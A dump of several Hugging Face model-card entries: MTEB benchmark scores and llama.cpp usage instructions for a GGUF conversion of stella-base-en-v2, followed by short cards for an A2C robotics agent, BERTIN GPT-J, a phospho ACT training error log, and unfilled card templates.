- type: mrr_at_5
value: 43.536
- type: ndcg_at_1
value: 31.257
- type: ndcg_at_10
value: 50.197
- type: ndcg_at_100
value: 55.062
- type: ndcg_at_1000
value: 55.81700000000001
- type: ndcg_at_3
value: 41.650999999999996
- type: ndcg_at_5
value: 46.324
- type: precision_at_1
value: 31.257
- type: precision_at_10
value: 8.508000000000001
- type: precision_at_100
value: 1.121
- type: precision_at_1000
value: 0.11900000000000001
- type: precision_at_3
value: 19.1
- type: precision_at_5
value: 14.16
- type: recall_at_1
value: 27.633999999999997
- type: recall_at_10
value: 71.40100000000001
- type: recall_at_100
value: 92.463
- type: recall_at_1000
value: 98.13199999999999
- type: recall_at_3
value: 49.382
- type: recall_at_5
value: 60.144
- task:
type: Retrieval
dataset:
name: MTEB QuoraRetrieval
type: quora
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 71.17099999999999
- type: map_at_10
value: 85.036
- type: map_at_100
value: 85.67099999999999
- type: map_at_1000
value: 85.68599999999999
- type: map_at_3
value: 82.086
- type: map_at_5
value: 83.956
- type: mrr_at_1
value: 82.04
- type: mrr_at_10
value: 88.018
- type: mrr_at_100
value: 88.114
- type: mrr_at_1000
value: 88.115
- type: mrr_at_3
value: 87.047
- type: mrr_at_5
value: 87.73100000000001
- type: ndcg_at_1
value: 82.03
- type: ndcg_at_10
value: 88.717
- type: ndcg_at_100
value: 89.904
- type: ndcg_at_1000
value: 89.991
- type: ndcg_at_3
value: 85.89099999999999
- type: ndcg_at_5
value: 87.485
- type: precision_at_1
value: 82.03
- type: precision_at_10
value: 13.444999999999999
- type: precision_at_100
value: 1.533
- type: precision_at_1000
value: 0.157
- type: precision_at_3
value: 37.537
- type: precision_at_5
value: 24.692
- type: recall_at_1
value: 71.17099999999999
- type: recall_at_10
value: 95.634
- type: recall_at_100
value: 99.614
- type: recall_at_1000
value: 99.99
- type: recall_at_3
value: 87.48
- type: recall_at_5
value: 91.996
- task:
type: Clustering
dataset:
name: MTEB RedditClustering
type: mteb/reddit-clustering
config: default
split: test
revision: 24640382cdbf8abc73003fb0fa6d111a705499eb
metrics:
- type: v_measure
value: 55.067219624685315
- task:
type: Clustering
dataset:
name: MTEB RedditClusteringP2P
type: mteb/reddit-clustering-p2p
config: default
split: test
revision: 282350215ef01743dc01b456c7f5241fa8937f16
metrics:
- type: v_measure
value: 62.121822992300444
- task:
type: Retrieval
dataset:
name: MTEB SCIDOCS
type: scidocs
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 4.153
- type: map_at_10
value: 11.024000000000001
- type: map_at_100
value: 13.233
- type: map_at_1000
value: 13.62
- type: map_at_3
value: 7.779999999999999
- type: map_at_5
value: 9.529
- type: mrr_at_1
value: 20.599999999999998
- type: mrr_at_10
value: 31.361
- type: mrr_at_100
value: 32.738
- type: mrr_at_1000
value: 32.792
- type: mrr_at_3
value: 28.15
- type: mrr_at_5
value: 30.085
- type: ndcg_at_1
value: 20.599999999999998
- type: ndcg_at_10
value: 18.583
- type: ndcg_at_100
value: 27.590999999999998
- type: ndcg_at_1000
value: 34.001
- type: ndcg_at_3
value: 17.455000000000002
- type: ndcg_at_5
value: 15.588
- type: precision_at_1
value: 20.599999999999998
- type: precision_at_10
value: 9.74
- type: precision_at_100
value: 2.284
- type: precision_at_1000
value: 0.381
- type: precision_at_3
value: 16.533
- type: precision_at_5
value: 14.02
- type: recall_at_1
value: 4.153
- type: recall_at_10
value: 19.738
- type: recall_at_100
value: 46.322
- type: recall_at_1000
value: 77.378
- type: recall_at_3
value: 10.048
- type: recall_at_5
value: 14.233
- task:
type: STS
dataset:
name: MTEB SICK-R
type: mteb/sickr-sts
config: default
split: test
revision: a6ea5a8cab320b040a23452cc28066d9beae2cee
metrics:
- type: cos_sim_pearson
value: 85.07097501003639
- type: cos_sim_spearman
value: 81.05827848407056
- type: euclidean_pearson
value: 82.6279003372546
- type: euclidean_spearman
value: 81.00031515279802
- type: manhattan_pearson
value: 82.59338284959495
- type: manhattan_spearman
value: 80.97432711064945
- task:
type: STS
dataset:
name: MTEB STS12
type: mteb/sts12-sts
config: default
split: test
revision: a0d554a64d88156834ff5ae9920b964011b16384
metrics:
- type: cos_sim_pearson
value: 86.28991993621685
- type: cos_sim_spearman
value: 78.71828082424351
- type: euclidean_pearson
value: 83.4881331520832
- type: euclidean_spearman
value: 78.51746826842316
- type: manhattan_pearson
value: 83.4109223774324
- type: manhattan_spearman
value: 78.431544382179
- task:
type: STS
dataset:
name: MTEB STS13
type: mteb/sts13-sts
config: default
split: test
revision: 7e90230a92c190f1bf69ae9002b8cea547a64cca
metrics:
- type: cos_sim_pearson
value: 83.16651661072123
- type: cos_sim_spearman
value: 84.88094386637867
- type: euclidean_pearson
value: 84.3547603585416
- type: euclidean_spearman
value: 84.85148665860193
- type: manhattan_pearson
value: 84.29648369879266
- type: manhattan_spearman
value: 84.76074870571124
- task:
type: STS
dataset:
name: MTEB STS14
type: mteb/sts14-sts
config: default
split: test
revision: 6031580fec1f6af667f0bd2da0a551cf4f0b2375
metrics:
- type: cos_sim_pearson
value: 83.40596254292149
- type: cos_sim_spearman
value: 83.10699573133829
- type: euclidean_pearson
value: 83.22794776876958
- type: euclidean_spearman
value: 83.22583316084712
- type: manhattan_pearson
value: 83.15899233935681
- type: manhattan_spearman
value: 83.17668293648019
- task:
type: STS
dataset:
name: MTEB STS15
type: mteb/sts15-sts
config: default
split: test
revision: ae752c7c21bf194d8b67fd573edf7ae58183cbe3
metrics:
- type: cos_sim_pearson
value: 87.27977121352563
- type: cos_sim_spearman
value: 88.73903130248591
- type: euclidean_pearson
value: 88.30685958438735
- type: euclidean_spearman
value: 88.79755484280406
- type: manhattan_pearson
value: 88.30305607758652
- type: manhattan_spearman
value: 88.80096577072784
- task:
type: STS
dataset:
name: MTEB STS16
type: mteb/sts16-sts
config: default
split: test
revision: 4d8694f8f0e0100860b497b999b3dbed754a0513
metrics:
- type: cos_sim_pearson
value: 84.08819031430218
- type: cos_sim_spearman
value: 86.35414445951125
- type: euclidean_pearson
value: 85.4683192388315
- type: euclidean_spearman
value: 86.2079674669473
- type: manhattan_pearson
value: 85.35835702257341
- type: manhattan_spearman
value: 86.08483380002187
- task:
type: STS
dataset:
name: MTEB STS17 (en-en)
type: mteb/sts17-crosslingual-sts
config: en-en
split: test
revision: af5e6fb845001ecf41f4c1e033ce921939a2a68d
metrics:
- type: cos_sim_pearson
value: 87.36149449801478
- type: cos_sim_spearman
value: 87.7102980757725
- type: euclidean_pearson
value: 88.16457177837161
- type: euclidean_spearman
value: 87.6598652482716
- type: manhattan_pearson
value: 88.23894728971618
- type: manhattan_spearman
value: 87.74470156709361
- task:
type: STS
dataset:
name: MTEB STS22 (en)
type: mteb/sts22-crosslingual-sts
config: en
split: test
revision: 6d1ba47164174a496b7fa5d3569dae26a6813b80
metrics:
- type: cos_sim_pearson
value: 64.54023758394433
- type: cos_sim_spearman
value: 66.28491960187773
- type: euclidean_pearson
value: 67.0853128483472
- type: euclidean_spearman
value: 66.10307543766307
- type: manhattan_pearson
value: 66.7635365592556
- type: manhattan_spearman
value: 65.76408004780167
- task:
type: STS
dataset:
name: MTEB STSBenchmark
type: mteb/stsbenchmark-sts
config: default
split: test
revision: b0fddb56ed78048fa8b90373c8a3cfc37b684831
metrics:
- type: cos_sim_pearson
value: 85.15858398195317
- type: cos_sim_spearman
value: 87.44850004752102
- type: euclidean_pearson
value: 86.60737082550408
- type: euclidean_spearman
value: 87.31591549824242
- type: manhattan_pearson
value: 86.56187011429977
- type: manhattan_spearman
value: 87.23854795795319
- task:
type: Reranking
dataset:
name: MTEB SciDocsRR
type: mteb/scidocs-reranking
config: default
split: test
revision: d3c5e1fc0b855ab6097bf1cda04dd73947d7caab
metrics:
- type: map
value: 86.66210488769109
- type: mrr
value: 96.23100664767331
- task:
type: Retrieval
dataset:
name: MTEB SciFact
type: scifact
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 56.094
- type: map_at_10
value: 67.486
- type: map_at_100
value: 67.925
- type: map_at_1000
value: 67.949
- type: map_at_3
value: 64.857
- type: map_at_5
value: 66.31
- type: mrr_at_1
value: 58.667
- type: mrr_at_10
value: 68.438
- type: mrr_at_100
value: 68.733
- type: mrr_at_1000
value: 68.757
- type: mrr_at_3
value: 66.389
- type: mrr_at_5
value: 67.456
- type: ndcg_at_1
value: 58.667
- type: ndcg_at_10
value: 72.506
- type: ndcg_at_100
value: 74.27
- type: ndcg_at_1000
value: 74.94800000000001
- type: ndcg_at_3
value: 67.977
- type: ndcg_at_5
value: 70.028
- type: precision_at_1
value: 58.667
- type: precision_at_10
value: 9.767000000000001
- type: precision_at_100
value: 1.073
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 27.0
- type: precision_at_5
value: 17.666999999999998
- type: recall_at_1
value: 56.094
- type: recall_at_10
value: 86.68900000000001
- type: recall_at_100
value: 94.333
- type: recall_at_1000
value: 99.667
- type: recall_at_3
value: 74.522
- type: recall_at_5
value: 79.611
- task:
type: PairClassification
dataset:
name: MTEB SprintDuplicateQuestions
type: mteb/sprintduplicatequestions-pairclassification
config: default
split: test
revision: d66bd1f72af766a5cc4b0ca5e00c162f89e8cc46
metrics:
- type: cos_sim_accuracy
value: 99.83069306930693
- type: cos_sim_ap
value: 95.69184662911199
- type: cos_sim_f1
value: 91.4027149321267
- type: cos_sim_precision
value: 91.91102123356926
- type: cos_sim_recall
value: 90.9
- type: dot_accuracy
value: 99.69405940594059
- type: dot_ap
value: 90.21674151456216
- type: dot_f1
value: 84.4489179667841
- type: dot_precision
value: 85.00506585612969
- type: dot_recall
value: 83.89999999999999
- type: euclidean_accuracy
value: 99.83069306930693
- type: euclidean_ap
value: 95.67760109671087
- type: euclidean_f1
value: 91.19754350051177
- type: euclidean_precision
value: 93.39622641509435
- type: euclidean_recall
value: 89.1
- type: manhattan_accuracy
value: 99.83267326732673
- type: manhattan_ap
value: 95.69771347732625
- type: manhattan_f1
value: 91.32420091324201
- type: manhattan_precision
value: 92.68795056642637
- type: manhattan_recall
value: 90.0
- type: max_accuracy
value: 99.83267326732673
- type: max_ap
value: 95.69771347732625
- type: max_f1
value: 91.4027149321267
- task:
type: Clustering
dataset:
name: MTEB StackExchangeClustering
type: mteb/stackexchange-clustering
config: default
split: test
revision: 6cbc1f7b2bc0622f2e39d2c77fa502909748c259
metrics:
- type: v_measure
value: 64.47378332953092
- task:
type: Clustering
dataset:
name: MTEB StackExchangeClusteringP2P
type: mteb/stackexchange-clustering-p2p
config: default
split: test
revision: 815ca46b2622cec33ccafc3735d572c266efdb44
metrics:
- type: v_measure
value: 33.79602531604151
- task:
type: Reranking
dataset:
name: MTEB StackOverflowDupQuestions
type: mteb/stackoverflowdupquestions-reranking
config: default
split: test
revision: e185fbe320c72810689fc5848eb6114e1ef5ec69
metrics:
- type: map
value: 53.80707639107175
- type: mrr
value: 54.64886522790935
- task:
type: Summarization
dataset:
name: MTEB SummEval
type: mteb/summeval
config: default
split: test
revision: cda12ad7615edc362dbf25a00fdd61d3b1eaf93c
metrics:
- type: cos_sim_pearson
value: 30.852448373051395
- type: cos_sim_spearman
value: 32.51821499493775
- type: dot_pearson
value: 30.390650062190456
- type: dot_spearman
value: 30.588836159667636
- task:
type: Retrieval
dataset:
name: MTEB TRECCOVID
type: trec-covid
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 0.198
- type: map_at_10
value: 1.51
- type: map_at_100
value: 8.882
- type: map_at_1000
value: 22.181
- type: map_at_3
value: 0.553
- type: map_at_5
value: 0.843
- type: mrr_at_1
value: 74.0
- type: mrr_at_10
value: 84.89999999999999
- type: mrr_at_100
value: 84.89999999999999
- type: mrr_at_1000
value: 84.89999999999999
- type: mrr_at_3
value: 84.0
- type: mrr_at_5
value: 84.89999999999999
- type: ndcg_at_1
value: 68.0
- type: ndcg_at_10
value: 64.792
- type: ndcg_at_100
value: 51.37199999999999
- type: ndcg_at_1000
value: 47.392
- type: ndcg_at_3
value: 68.46900000000001
- type: ndcg_at_5
value: 67.084
- type: precision_at_1
value: 74.0
- type: precision_at_10
value: 69.39999999999999
- type: precision_at_100
value: 53.080000000000005
- type: precision_at_1000
value: 21.258
- type: precision_at_3
value: 76.0
- type: precision_at_5
value: 73.2
- type: recall_at_1
value: 0.198
- type: recall_at_10
value: 1.7950000000000002
- type: recall_at_100
value: 12.626999999999999
- type: recall_at_1000
value: 44.84
- type: recall_at_3
value: 0.611
- type: recall_at_5
value: 0.959
- task:
type: Retrieval
dataset:
name: MTEB Touche2020
type: webis-touche2020
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 1.4949999999999999
- type: map_at_10
value: 8.797
- type: map_at_100
value: 14.889
- type: map_at_1000
value: 16.309
- type: map_at_3
value: 4.389
- type: map_at_5
value: 6.776
- type: mrr_at_1
value: 18.367
- type: mrr_at_10
value: 35.844
- type: mrr_at_100
value: 37.119
- type: mrr_at_1000
value: 37.119
- type: mrr_at_3
value: 30.612000000000002
- type: mrr_at_5
value: 33.163
- type: ndcg_at_1
value: 16.326999999999998
- type: ndcg_at_10
value: 21.9
- type: ndcg_at_100
value: 34.705000000000005
- type: ndcg_at_1000
value: 45.709
- type: ndcg_at_3
value: 22.7
- type: ndcg_at_5
value: 23.197000000000003
- type: precision_at_1
value: 18.367
- type: precision_at_10
value: 21.02
- type: precision_at_100
value: 7.714
- type: precision_at_1000
value: 1.504
- type: precision_at_3
value: 26.531
- type: precision_at_5
value: 26.122
- type: recall_at_1
value: 1.4949999999999999
- type: recall_at_10
value: 15.504000000000001
- type: recall_at_100
value: 47.978
- type: recall_at_1000
value: 81.56
- type: recall_at_3
value: 5.569
- type: recall_at_5
value: 9.821
- task:
type: Classification
dataset:
name: MTEB ToxicConversationsClassification
type: mteb/toxic_conversations_50k
config: default
split: test
revision: d7c0de2777da35d6aae2200a62c6e0e5af397c4c
metrics:
- type: accuracy
value: 72.99279999999999
- type: ap
value: 15.459189680101492
- type: f1
value: 56.33023271441895
- task:
type: Classification
dataset:
name: MTEB TweetSentimentExtractionClassification
type: mteb/tweet_sentiment_extraction
config: default
split: test
revision: d604517c81ca91fe16a244d1248fc021f9ecee7a
metrics:
- type: accuracy
value: 63.070175438596486
- type: f1
value: 63.28070758709465
- task:
type: Clustering
dataset:
name: MTEB TwentyNewsgroupsClustering
type: mteb/twentynewsgroups-clustering
config: default
split: test
revision: 6125ec4e24fa026cec8a478383ee943acfbd5449
metrics:
- type: v_measure
value: 50.076231309703054
- task:
type: PairClassification
dataset:
name: MTEB TwitterSemEval2015
type: mteb/twittersemeval2015-pairclassification
config: default
split: test
revision: 70970daeab8776df92f5ea462b6173c0b46fd2d1
metrics:
- type: cos_sim_accuracy
value: 87.21463908922931
- type: cos_sim_ap
value: 77.67287017966282
- type: cos_sim_f1
value: 70.34412955465588
- type: cos_sim_precision
value: 67.57413709285368
- type: cos_sim_recall
value: 73.35092348284961
- type: dot_accuracy
value: 85.04500208618943
- type: dot_ap
value: 70.4075203869744
- type: dot_f1
value: 66.18172537008678
- type: dot_precision
value: 64.08798813643104
- type: dot_recall
value: 68.41688654353561
- type: euclidean_accuracy
value: 87.17887584192646
- type: euclidean_ap
value: 77.5774128274464
- type: euclidean_f1
value: 70.09307972480777
- type: euclidean_precision
value: 71.70852884349986
- type: euclidean_recall
value: 68.54881266490766
- type: manhattan_accuracy
value: 87.28020504261787
- type: manhattan_ap
value: 77.57835820297892
- type: manhattan_f1
value: 70.23063591521131
- type: manhattan_precision
value: 70.97817299919159
- type: manhattan_recall
value: 69.49868073878628
- type: max_accuracy
value: 87.28020504261787
- type: max_ap
value: 77.67287017966282
- type: max_f1
value: 70.34412955465588
- task:
type: PairClassification
dataset:
name: MTEB TwitterURLCorpus
type: mteb/twitterurlcorpus-pairclassification
config: default
split: test
revision: 8b6510b0b1fa4e4c4f879467980e9be563ec1cdf
metrics:
- type: cos_sim_accuracy
value: 88.96650754841464
- type: cos_sim_ap
value: 86.00185968965064
- type: cos_sim_f1
value: 77.95861256351718
- type: cos_sim_precision
value: 74.70712773465067
- type: cos_sim_recall
value: 81.50600554357868
- type: dot_accuracy
value: 87.36950362867233
- type: dot_ap
value: 82.22071181147555
- type: dot_f1
value: 74.85680716698488
- type: dot_precision
value: 71.54688377316114
- type: dot_recall
value: 78.48783492454572
- type: euclidean_accuracy
value: 88.99561454573679
- type: euclidean_ap
value: 86.15882097229648
- type: euclidean_f1
value: 78.18463125322332
- type: euclidean_precision
value: 74.95408956067241
- type: euclidean_recall
value: 81.70619032953496
- type: manhattan_accuracy
value: 88.96650754841464
- type: manhattan_ap
value: 86.13133111232099
- type: manhattan_f1
value: 78.10771470160115
- type: manhattan_precision
value: 74.05465084184377
- type: manhattan_recall
value: 82.63012011087157
- type: max_accuracy
value: 88.99561454573679
- type: max_ap
value: 86.15882097229648
- type: max_f1
value: 78.18463125322332
---
# kalle07/stella-base-en-v2-Q8_0-GGUF
This model was converted to GGUF format from [`infgrad/stella-base-en-v2`](https://huggingface.co/infgrad/stella-base-en-v2) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/infgrad/stella-base-en-v2) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -c 2048
```
|
dhadheechi/a2c-PandaReachDense-v3 | dhadheechi | 2025-06-09T09:22:26Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"PandaReachDense-v3",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T09:18:19Z | ---
library_name: stable-baselines3
tags:
- PandaReachDense-v3
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: A2C
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: PandaReachDense-v3
type: PandaReachDense-v3
metrics:
- type: mean_reward
value: -0.19 +/- 0.11
name: mean_reward
verified: false
---
# **A2C** Agent playing **PandaReachDense-v3**
This is a trained model of a **A2C** agent playing **PandaReachDense-v3**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
TODO: Add your code
```python
from stable_baselines3 import ...
from huggingface_sb3 import load_from_hub
...
```
|
MJ92/Llama-2-7b-chat-hf_finetuned_cass_1000 | MJ92 | 2025-06-09T09:20:48Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T09:10:17Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
bertin-project/bertin-gpt-j-6B-boe-summaries | bertin-project | 2025-06-09T09:19:14Z | 21 | 0 | transformers | [
"transformers",
"pytorch",
"safetensors",
"gptj",
"text-generation",
"es",
"dataset:bertin-project/BOE-XSUM",
"base_model:bertin-project/bertin-gpt-j-6B",
"base_model:finetune:bertin-project/bertin-gpt-j-6B",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-02-01T14:19:56Z | ---
license: apache-2.0
language:
- es
base_model:
- bertin-project/bertin-gpt-j-6B
pipeline_tag: text-generation
library_name: transformers
datasets:
- bertin-project/BOE-XSUM
--- |
phospho-app/oulianov-ACT_BBOX-TEST7-q0utt | phospho-app | 2025-06-09T09:18:35Z | 0 | 0 | null | [
"phosphobot",
"act",
"region:us"
] | null | 2025-06-09T09:16:31Z |
---
tags:
- phosphobot
- act
task_categories:
- robotics
---
# act Model - phospho Training Pipeline
## Error Traceback
We faced an issue while training your model.
```
Caught KeyError in DataLoader worker process 1.
Original Traceback (most recent call last):
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/worker.py", line 349, in _worker_loop
data = fetcher.fetch(index) # type: ignore[possibly-undefined]
^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/fetch.py", line 55, in fetch
return self.collate_fn(data)
^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 398, in default_collate
return collate(batch, collate_fn_map=default_collate_fn_map)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 171, in collate
{
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <dictcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <listcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
~^^^^^
KeyError: 'observation.environment_state'
```
## Training parameters:
- **Dataset**: [Lithium73fr/TEST7](https://huggingface.co/datasets/Lithium73fr/TEST7)
- **Wandb run URL**: None
- **Epochs**: None
- **Batch size**: 100
- **Training steps**: 10000
📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)
🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
|
KatrinaSky/llama_paul | KatrinaSky | 2025-06-09T09:14:19Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-26T07:47:07Z | ---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
